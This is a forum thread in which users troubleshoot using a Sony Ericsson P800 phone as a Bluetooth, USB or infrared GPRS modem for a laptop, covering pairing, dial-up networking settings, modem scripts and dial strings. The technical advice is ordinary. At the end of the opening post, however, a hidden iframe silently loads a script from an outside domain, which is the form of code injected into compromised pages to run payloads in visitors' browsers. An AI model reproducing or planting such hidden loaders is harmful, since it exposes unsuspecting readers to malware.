Use P800 as bluetooth modem for laptop? HELP!

Hey, I really need help with this one....

I tried to set up my P800 as a modem for my laptop via bluetooth connection. I used the setup assistant, but after the first window it tells me that there is no phone connected to the laptop, this is not the case because I synchronized my data a few seconds before via the bluetooth connection, so there has to be an established connection. Also the monitor shows a connection on Com5.

So, does anybody know how I can set up the modem connection manually? What are the settings I need to use? Please help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Have you 'paired' the devices?
Have you set the Dial Up Network port?

Yes, I have paired the devices. Works fine with the synchronization.

But what do you mean with setting the dial up networking port?

on your pc - control panel>modems is the p800 configured there as a modem?

I'll bite the bullet and buy the bluetooth connection for my pc so I can help out a bit further - lots of questions are arising...

A solution

Had the same problem. I marked the cable connection in the connection setup on the phone as modem, plus removed and inserted the Bluetooth device on the PC. I also unchecked the com port used by the connection manager to look for the phone when syncronizing. It then worked.

The "cable" setting doesn't matter when you're using bluetooth - mine is still on PC Connect and I can use my p800 as a bluetooth modem.

DoubleSpeed - in your Bluetooth Places on your laptop is the p800 icon showing. If so, is one of the 'services' it offers Dial Up Networking? Each service that your laptop wants to use from the host device must be activated.

I remember having a similar problem to you but sorted it, only I can't remember how. Not much use, eh? I'll have a look on my home computer at what settings i've got and report back.

Hi rusquel,

Thanks for replying - yes the phone is showing in my Bluetooth Places and I have two main services enabled - Serial Port and Dial-up Networking.

If I click on the Dial-up Networking a link with the phone is established and a connection window is opened - to connect to gprs I was advised to enter *99# as the phone number with no username or password - when I click connect I get - Registering your computer on the network but then it fails with either TCP/IP CP reported error 718 - timed out waiting for a valid response from computer also I have had a message unable to agree PPP protocols - any ideas.

I have also tried using the Sony Ericsson -> Dial-Up Networking Wizard to make the dial-up connection with the phone but the Wizard will not see the phone?

Did you use the Sony Ericsson -> Dial-Up Networking Wizard or did you just click the Dial-up Networking link in My Bluetooth Places

I've just setup my new laptop to recieve email through my p800 and after a couple of teething problems I have it working fine.

Now there's going to be a bit of a difference cos I still use GSM to connect (ahhh how quaint), but essentially I:

1: paired the laptop with the p800
2: set the p800 services on the laptop so that Dial Up Networking was enabled on this device (as it sounds as though you've done).
3: In the Start > Connect to > Bluetooth connection, right clicked to Properties and set it up to dial directly to my dial-up ISP. (I guess this is where you GPRS peoples would put *99#) INCLUDING the username & password. Not sure how it would work without putting a username in but then I've never really ventured into GPRS
4. Use Start > BluetoothConnection to connect - takes about 15-20 secs and then connect to Outlook to pull my e-mails. Can also opne internet explorer but VERY slowly. That's what broadband is for.

Not sure how much this would help you, but it may be worth a go if you still have a dial-up network ISP, just to test your phone/laptop communication.

Thumbs up A solution!

Well, I made it work after some hassle.

First of all, the SonyEricsson DUN setup wizard is useless. It first expects you to have your smartphone already installed as a modem (you can download P800 modem scripts from their site, I attached the same ZIP here). This is not much of a problem if you connect the P800 using a USB cable:
1. on the P800 go to control panel, Connections, Cable, and there select that you want to use it for modem, not PC connect.
2. Secondly, in the system tray, on the Phone connection link right-click on it, go to properties and disable the port on which the phone communicates.
3. Go to Control Panel (of the PC, not P800), Phone Monitor Options and, under "COM ports" tab enable that same port (that you disabled a moment ago in a different place).
4. Go to Control Panel, Phone and Modem options (under Win2k/XP) or Modems (under Win 9x) and add a modem. Win2x/XP won't let you add a modem on the proper port (the one you enabled under 3) unless it is enabled. Then you click on "select from list", then "have disk", then point to modem scripts downloaded from www.sonyericsson.com.
5. NOW start the SonyEricsson wizard and let it create a DUN entry.
6. Unfortunately, it is stupid, so it can't copy proper username and password for login into GPRS connection, you have to test, it depends on your GPRS operator's settings. It may be an actual username and password you received, it may be all blank, or it may be, like in my case, a dummy username and password that all GPRS users use, and that is already entered into your P800.

This same procedure functions also if you use P800 as an IrDA GPRS modem. You also must set up IR for modem use on your P800 (Control Panel, Connections, IR), activate IR, put it in range so your laptop detects it, then follow from point 2 from above.

Of course, if you later wish to synchronise P800 with Outlook across the same connection, you have to reverse the settings, from 3 back to 1 in order to re-enable it.

And now comes the bluetooth...

I haven't succeeded in setting it up using SonyEricsson drivers and wizard because
it simply won't recognise the bluetooth modem on any port regardless of what I do.

Anyway, I did it using a bluetooth modem driver provided by bluetooth manufacturer (I use a MSI BToes bluetooth USB adapter). I simply created a DUN connection using this bluetooth modem, disabled (unchecked) software compression for PPP protocol and IP header compression for PPP link under advanced IP settings, put a *99***2# for a phone number to dial and the dummy username and password that my provider uses.

If you ommit or miss the username and password, or the dialling number you will not get a proper error message! Instead, you'll get a message (that someone already mentioned) - something like "IP error 718, TCP/IP address not received".

Remember! In your case, the dial number may *99***someotherdigit#. The digit after the triple asterisk actually signifies the connection number in the P800 Control panel / Internet connections setup. So, if you, like myself, have 2 GSM-data connections and a GPRS connection defined, starting from zero, the GPRS connection turns out to be number 2. If I put one, it also connects, but not via GPRS, rather via GSM data, on 9600 bps (slooooow - this is, in effect, same as mephistocat did).

Anyway, when you manage to start it properly, you'll see on your P800, with the flip open, on the status bar in the bottom, that GPRS icon merrily blinks.

Of course, it goes without saying, before any bluetooth operation works, you must properly pair the devices and, preferably tell the P800 to always accept communication from that (your) laptop (under Control Panel / connections / Bluetooth / Settings first turn the Bluetooth on under settings, then pair the devices, and then, on the P800, under Control Panel / connections / Bluetooth / Devices tap the laptop and in the dialog that opens, check the "Always alow this device to connect").
